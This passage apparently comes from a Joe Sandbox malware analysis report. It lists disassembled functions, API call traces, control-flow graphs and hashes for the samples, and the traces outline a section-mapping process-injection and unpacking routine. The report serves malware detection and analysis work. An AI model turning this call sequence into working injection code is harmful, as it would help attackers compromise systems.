                                                        • Opcode Fuzzy Hash: 48afa338b6eb4ead81a9d6383d5bdcf6d33ddda25fb9a1f4e9ca7df9d9b0c8b0
                                                        • Instruction Fuzzy Hash: C201C0B1708104EBDB009A84DC62E7A3214AF41714F204137BA57791F1C53EAA23FB5B
                                                        Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 388 40198a-40199d 389 4019a8-4019c5 Sleep call 401482 388->389 390 4019a2 call 401207 388->390 393 4019d4-401a19 389->393 394 4019c7-4019cf call 401583 389->394 390->389 404 401a1c-401a25 call 401207 393->404 405 401a0f-401a15 393->405 394->393 405->404
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                          • Part of subcall function 00401583: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                          • Part of subcall function 00401583: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                          • Part of subcall function 00401583: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                        • String ID:
                                                        • API String ID: 1885482327-0
                                                        • Opcode ID: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction ID: 93e9f4b763319a312fe66b3304ba82e0c9e14e36225fd67d869cb8e68c59c211
                                                        • Opcode Fuzzy Hash: 66f4d7de36bf33a8276767325b567db769fa807301e16b4e03cd2b1c881b4aa0
                                                        • Instruction Fuzzy Hash: 5501B572308244EBDB019F90DC92EAE3728AF45318F24017BB557790E2C53DA912EB1B
                                                        Function 00601696 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 408 601696-6016d0 call 6019a9 411 6016d2-601705 VirtualAlloc call 601723 408->411 412 60171e 408->412 414 60170a-60171c 411->414 412->412 414->412
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006016E7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction ID: b9abbc90aa05ea29814438a8c338ac5a84343a202bced34a37e35c4b1e36a204
                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                        • Instruction Fuzzy Hash: E3113C79A40208EFDB01DF98C985E99BBF5AF08350F058094F9489B362D771EA50DF80

                                                        Non-executed Functions

                                                        Function 0062092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .$GetProcAddress.$l
                                                        • API String ID: 0-2784972518
                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction ID: 2ba7ce5c814ab9565d4597d47c006d941323b89efae0f9c485d6973fd74c974a
                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                        • Instruction Fuzzy Hash: BF3138B6901619DFEB10CF99D880AEDBBF6FF48324F14504AD441A7312D771AA85CFA4
                                                        Function 00402721 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #X%
                                                        • API String ID: 0-730838689
                                                        • Opcode ID: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                                        • Instruction ID: 71e09992ebba1ebce1a14e5228dc5e73fa07ad40964d1ad344f7d49068a62d69
                                                        • Opcode Fuzzy Hash: 245b7a6330694b5c367d3b257ccbe4366a0bf95add0a101e660e11a0368d02b9
                                                        • Instruction Fuzzy Hash: 2441DC352485539DC30299188E899EABF79FDC7398B10017ED8C2AB9D3CBA02517D3B6
                                                        Function 00401A28 Relevance: .3, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862464987.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_kGSZ4dCqYh.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                                        • Instruction ID: 18334b27c1f95b13a70b5794667acb6e5ebe9408c321dbf9d60f89b0be35e569
                                                        • Opcode Fuzzy Hash: 24dfe36045d0991ac749a0892ad312c9a4e30bcc45954bcab72f1b8cf2b0dd63
                                                        • Instruction Fuzzy Hash: AA51AE612492109FE71989358C829B637219F43726F2C327FE98267EE6D379D4438A4A
                                                        Function 006012B4 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5f0000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction ID: b95ee2f3405d58ffd56745f0012b1804cb726cbe13f6560bba5720daa0619b56
                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                        • Instruction Fuzzy Hash: 7C1170723801009FD748DF55DC81FA773EAEB89320B298069ED04CB755D675E842C760
                                                        Function 00620D90 Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_620000_kGSZ4dCqYh.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction ID: 24baee486935e57d3a0b741057cb9f05ffc7e32a8ab280632829428391162b7e
                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                        • Instruction Fuzzy Hash: 0301F776601A108FEF21CF60E804BEA33F7EF85305F0548E4D90697342E770A8418F80

                                                        Execution Graph

                                                        Execution Coverage:8.9%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:108
                                                        Total number of Limit Nodes:2
                                                        execution_graph 2804 55003c 2805 550049 2804->2805 2817 550e0f SetErrorMode SetErrorMode 2805->2817 2810 550265 2811 5502ce VirtualProtect 2810->2811 2813 55030b 2811->2813 2812 550439 VirtualFree 2816 5504be LoadLibraryA 2812->2816 2813->2812 2815 5508c7 2816->2815 2818 550223 2817->2818 2819 550d90 2818->2819 2820 550dad 2819->2820 2821 550dbb GetPEB 2820->2821 2822 550238 VirtualAlloc 2820->2822 2821->2822 2822->2810 2898 40198a 2899 4019a8 Sleep 2898->2899 2900 401207 2898->2900 2901 4019c3 2899->2901 2900->2899 2902 401583 7 API calls 2901->2902 2903 4019d4 2901->2903 2902->2903 2904 40158e 2905 4015bf 2904->2905 2906 401634 NtDuplicateObject 2905->2906 2915 401750 2905->2915 2907 401651 NtCreateSection 2906->2907 2906->2915 2908 4016d1 NtCreateSection 2907->2908 2909 401677 NtMapViewOfSection 2907->2909 2910 4016fd 2908->2910 2908->2915 2909->2908 2911 40169a NtMapViewOfSection 2909->2911 2912 401707 NtMapViewOfSection 2910->2912 2910->2915 2911->2908 2913 4016b8 2911->2913 2914 40172e NtMapViewOfSection 2912->2914 2912->2915 2913->2908 2914->2915 2823 402e50 2825 402e54 2823->2825 2824 401959 8 API calls 2826 402fa8 2824->2826 2825->2824 2825->2826 2831 550005 2836 55092b GetPEB 2831->2836 2833 550030 2838 55003c 2833->2838 2837 550972 2836->2837 2837->2833 2839 550049 2838->2839 2840 550e0f 2 API calls 2839->2840 2841 550223 2840->2841 2842 550d90 GetPEB 2841->2842 2843 550238 VirtualAlloc 2842->2843 2844 550265 2843->2844 2845 5502ce VirtualProtect 2844->2845 2847 55030b 2845->2847 2846 550439 VirtualFree 2850 5504be LoadLibraryA 2846->2850 2847->2846 2849 5508c7 2850->2849 2873 401970 2874 401975 2873->2874 2875 4019a8 Sleep 2874->2875 2876 4019c3 2875->2876 2877 401583 7 API calls 2876->2877 2878 4019d4 2876->2878 2877->2878 2760 403054 2761 403197 2760->2761 2762 40307e 2760->2762 2762->2761 2763 403139 RtlCreateUserThread NtTerminateProcess 2762->2763 2763->2761 2851 550001 2852 550005 2851->2852 2853 55092b GetPEB 2852->2853 2854 550030 2853->2854 2855 55003c 7 API calls 2854->2855 2856 550038 2855->2856 2764 531226 2767 531237 2764->2767 2768 531246 2767->2768 2771 5319d7 2768->2771 2772 5319f2 2771->2772 2773 5319fb CreateToolhelp32Snapshot 2772->2773 2774 531a17 Module32First 2772->2774 2773->2772 2773->2774 2775 531a26 2774->2775 2776 531236 2774->2776 2778 531696 2775->2778 2779 5316c1 2778->2779 2780 5316d2 VirtualAlloc 2779->2780 2781 53170a 2779->2781 2780->2781 2781->2781 2782 402f17 2783 402f1c 2782->2783 2785 402fa8 2783->2785 2786 401959 2783->2786 2787 401968 2786->2787 2788 4019a8 Sleep 2787->2788 2789 4019c3 2788->2789 2791 4019d4 2789->2791 2792 401583 2789->2792 2791->2785 2793 401594 2792->2793 2794 401634 NtDuplicateObject 2793->2794 2803 401750 2793->2803 2795 401651 NtCreateSection 2794->2795 2794->2803 2796 4016d1 NtCreateSection 2795->2796 2797 401677 NtMapViewOfSection 2795->2797 2798 4016fd 2796->2798 2796->2803 2797->2796 2799 40169a NtMapViewOfSection 2797->2799 2800 401707 NtMapViewOfSection 2798->2800 2798->2803 2799->2796 2801 4016b8 2799->2801 2802 40172e NtMapViewOfSection 2800->2802 2800->2803 2801->2796 2802->2803 2803->2791 2885 401919 2886 401969 2885->2886 2887 40191d 2885->2887 2888 4019a8 Sleep 2886->2888 2889 4019c3 2888->2889 2890 401583 7 API calls 2889->2890 2891 4019d4 2889->2891 2890->2891

                                                        Executed Functions

                                                        Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 85 401583-4015de call 401207 97 4015e0 85->97 98 4015e3-4015e8 85->98 97->98 100 401909-401911 98->100 101 4015ee-4015ff 98->101 100->98 106 401916-401956 call 401207 100->106 104 401605-40162e 101->104 105 401907 101->105 104->105 113 401634-40164b NtDuplicateObject 104->113 105->106 113->105 115 401651-401675 NtCreateSection 113->115 117 4016d1-4016f7 NtCreateSection 115->117 118 401677-401698 NtMapViewOfSection 115->118 117->105 121 4016fd-401701 117->121 118->117 122 40169a-4016b6 NtMapViewOfSection 118->122 121->105 123 401707-401728 NtMapViewOfSection 121->123 122->117 124 4016b8-4016ce 122->124 123->105 127 40172e-40174a NtMapViewOfSection 123->127 124->117 127->105 130 401750 127->130 130->105 131 401750 call 401755 130->131 131->105
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction ID: f2d5e20ae79a609852431105b0704d648b73f45673a5aa535929140ce5e9a1ec
                                                        • Opcode Fuzzy Hash: d8025aa2a73fa1757bf9d96cb7b1acd78e4ac8c64498884b03c6ab91ddf532bc
                                                        • Instruction Fuzzy Hash: 42614DB0900209FFEB218F91CC48FAF7BB8EF85710F10012AF952BA1E5D6749941DB25
                                                        Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 132 40158e-4015b6 133 4015c8 132->133 134 4015bf-4015de call 401207 132->134 133->134 138 4015e0 134->138 139 4015e3-4015e8 134->139 138->139 141 401909-401911 139->141 142 4015ee-4015ff 139->142 141->139 147 401916-401956 call 401207 141->147 145 401605-40162e 142->145 146 401907 142->146 145->146 154 401634-40164b NtDuplicateObject 145->154 146->147 154->146 156 401651-401675 NtCreateSection 154->156 158 4016d1-4016f7 NtCreateSection 156->158 159 401677-401698 NtMapViewOfSection 156->159 158->146 162 4016fd-401701 158->162 159->158 163 40169a-4016b6 NtMapViewOfSection 159->163 162->146 164 401707-401728 NtMapViewOfSection 162->164 163->158 165 4016b8-4016ce 163->165 164->146 168 40172e-40174a NtMapViewOfSection 164->168 165->158 168->146 171 401750 168->171 171->146 172 401750 call 401755 171->172 172->146
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction ID: 0dfbee2a1f0830b6acdc9e972913786be015a59f94024eee438c43ca1dd55f4f
                                                        • Opcode Fuzzy Hash: b0195c2069dc6e331d8d87e09b392f04d65fbe6eaf74cb5c44d370e3a2e163ea
                                                        • Instruction Fuzzy Hash: BA5139B1900249BFEF218F91CC49FEBBFB8EF86714F140159F951AA2A5D670A941CB24
                                                        Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 173 4015bc-4015c5 174 4015d0-4015de 173->174 175 4015ca call 401207 173->175 176 4015e0 174->176 177 4015e3-4015e8 174->177 175->174 176->177 179 401909-401911 177->179 180 4015ee-4015ff 177->180 179->177 185 401916-401956 call 401207 179->185 183 401605-40162e 180->183 184 401907 180->184 183->184 192 401634-40164b NtDuplicateObject 183->192 184->185 192->184 194 401651-401675 NtCreateSection 192->194 196 4016d1-4016f7 NtCreateSection 194->196 197 401677-401698 NtMapViewOfSection 194->197 196->184 200 4016fd-401701 196->200 197->196 201 40169a-4016b6 NtMapViewOfSection 197->201 200->184 202 401707-401728 NtMapViewOfSection 200->202 201->196 203 4016b8-4016ce 201->203 202->184 206 40172e-40174a NtMapViewOfSection 202->206 203->196 206->184 209 401750 206->209 209->184 210 401750 call 401755 209->210 210->184
                                                        APIs
                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401643
                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401670
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401693
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B1
                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F2
                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401723
                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401745
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Section$View$Create$DuplicateObject
                                                        • String ID:
                                                        • API String ID: 1546783058-0
                                                        • Opcode ID: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction ID: 9e9cfe78a9b9fcbe8a20f4c56589f3f995e8910032e3214eb5438fd9bfe06916
                                                        • Opcode Fuzzy Hash: cc208e499be32a7b8d2e1b8f44698ba7bae8291931bb2c7a737ae2018edfaae9
                                                        • Instruction Fuzzy Hash: 855129B1900249BFEF218F91CC48FAFBBB8EF86B15F100159F951AA2A5D7709940CB20
                                                        Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 211 403054-403078 212 403197-40319c 211->212 213 40307e-403096 211->213 213->212 214 40309c-4030ad 213->214 215 4030af-4030b8 214->215 216 4030bd-4030cb 215->216 216->216 217 4030cd-4030d4 216->217 218 4030f6-4030fd 217->218 219 4030d6-4030f5 217->219 220 40311f-403122 218->220 221 4030ff-40311e 218->221 219->218 222 403124-403127 220->222 223 40312b 220->223 221->220 222->223 224 403129 222->224 223->215 225 40312d-403132 223->225 224->225 225->212 226 403134-403137 225->226 226->212 227 403139-403194 RtlCreateUserThread NtTerminateProcess 226->227 227->212
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: CreateProcessTerminateThreadUser
                                                        • String ID:
                                                        • API String ID: 1921587553-0
                                                        • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction ID: bb3d83799e525a3431e0f051c565fd2002d42970a2b52bf5f395df3a052ac564
                                                        • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                        • Instruction Fuzzy Hash: 9F412732618E0C4FD768EE6CA84966377D5E798311F1A43ABD809D7389EE30D85187C5
                                                        Function 0055003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 55003c-550047 1 55004c-550263 call 550a3f call 550e0f call 550d90 VirtualAlloc 0->1 2 550049 0->2 17 550265-550289 call 550a69 1->17 18 55028b-550292 1->18 2->1 22 5502ce-5503c2 VirtualProtect call 550cce call 550ce7 17->22 19 5502a1-5502b0 18->19 21 5502b2-5502cc 19->21 19->22 21->19 29 5503d1-5503e0 22->29 30 5503e2-550437 call 550ce7 29->30 31 550439-5504b8 VirtualFree 29->31 30->29 33 5505f4-5505fe 31->33 34 5504be-5504cd 31->34 36 550604-55060d 33->36 37 55077f-550789 33->37 35 5504d3-5504dd 34->35 35->33 39 5504e3-550505 35->39 36->37 42 550613-550637 36->42 40 5507a6-5507b0 37->40 41 55078b-5507a3 37->41 51 550517-550520 39->51 52 550507-550515 39->52 44 5507b6-5507cb 40->44 45 55086e-5508be LoadLibraryA 40->45 41->40 46 55063e-550648 42->46 48 5507d2-5507d5 44->48 50 5508c7-5508f9 45->50 46->37 49 55064e-55065a 46->49 53 550824-550833 48->53 54 5507d7-5507e0 48->54 49->37 55 550660-55066a 49->55 56 550902-55091d 50->56 57 5508fb-550901 50->57 58 550526-550547 51->58 52->58 62 550839-55083c 53->62 59 5507e4-550822 54->59 60 5507e2 54->60 61 55067a-550689 55->61 57->56 63 55054d-550550 58->63 59->48 60->53 64 550750-55077a 61->64 65 55068f-5506b2 61->65 62->45 66 55083e-550847 62->66 68 550556-55056b 63->68 69 5505e0-5505ef 63->69 64->46 70 5506b4-5506ed 65->70 71 5506ef-5506fc 65->71 72 550849 66->72 73 55084b-55086c 66->73 74 55056d 68->74 75 55056f-55057a 68->75 69->35 70->71 76 5506fe-550748 71->76 77 55074b 71->77 72->45 73->62 74->69 79 55057c-550599 75->79 80 55059b-5505bb 75->80 76->77 77->61 84 5505bd-5505db 79->84 80->84 84->63
                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0055024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_550000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: 45bb27c3125b16f6db0b06f06b814a4eb305919380205288ee8db3488fa42a7c
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: 39526C74A00229DFDB64CF58C995BA8BBB1BF09305F1480DAE94DA7351DB30AE89DF14
                                                        Function 005319D7 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 5319d7-5319f0 229 5319f2-5319f4 228->229 230 5319f6 229->230 231 5319fb-531a07 CreateToolhelp32Snapshot 229->231 230->231 232 531a17-531a24 Module32First 231->232 233 531a09-531a0f 231->233 234 531a26-531a27 call 531696 232->234 235 531a2d-531a35 232->235 233->232 239 531a11-531a15 233->239 240 531a2c 234->240 239->229 239->232 240->235
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005319FF
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00531A1F
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_520000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 3833638111-0
                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction ID: 0a18dc108f91c45d530b43be9e28cb3a195ea6a2cd38313b1d272b70ba000deb
                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                        • Instruction Fuzzy Hash: 3DF09632101B117BD7203BF59C8DB6E7BE8BF49726F140628E643954C0DB70EC4546A5
                                                        Function 00550E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 550e0f-550e24 SetErrorMode * 2 242 550e26 241->242 243 550e2b-550e2c 241->243 242->243
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00550223,?,?), ref: 00550E19
                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00550223,?,?), ref: 00550E1E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_550000_dvjdfvr.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction ID: 59f4f3660f24c022e483895a9ce12252ed7c3a0652483bba4d3b890b59234470
                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                        • Instruction Fuzzy Hash: 8AD0123114512877D7002AD4DC09BCD7F1CDF05B63F108411FB0DD9080C770994046E5
                                                        Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 244 401919-40191a 245 401969-4019c5 call 401207 Sleep call 401482 244->245 246 40191d-401956 call 401207 244->246 267 4019d4-401a19 245->267 268 4019c7-4019cf call 401583 245->268 278 401a1c-401a25 call 401207 267->278 279 401a0f-401a15 267->279 268->267 279->278
                                                        APIs
                                                        • Sleep.KERNELBASE(00001388,000000FA), ref: 004019B0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2090213595.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_dvjdfvr.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction ID: 49835af623e861a6f2ddbc0bf662c5c40176c384461ea98b099af7f339eb22c4
                                                        • Opcode Fuzzy Hash: 2b935ac753e934015516d799e1095bac90694ea099bafde975148c207ca850c9
                                                        • Instruction Fuzzy Hash: 7911DCB234C201EBD6009A84A862E7A3214AB51359F304537FA57B90F2D57D9A13F76F
                                                        Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
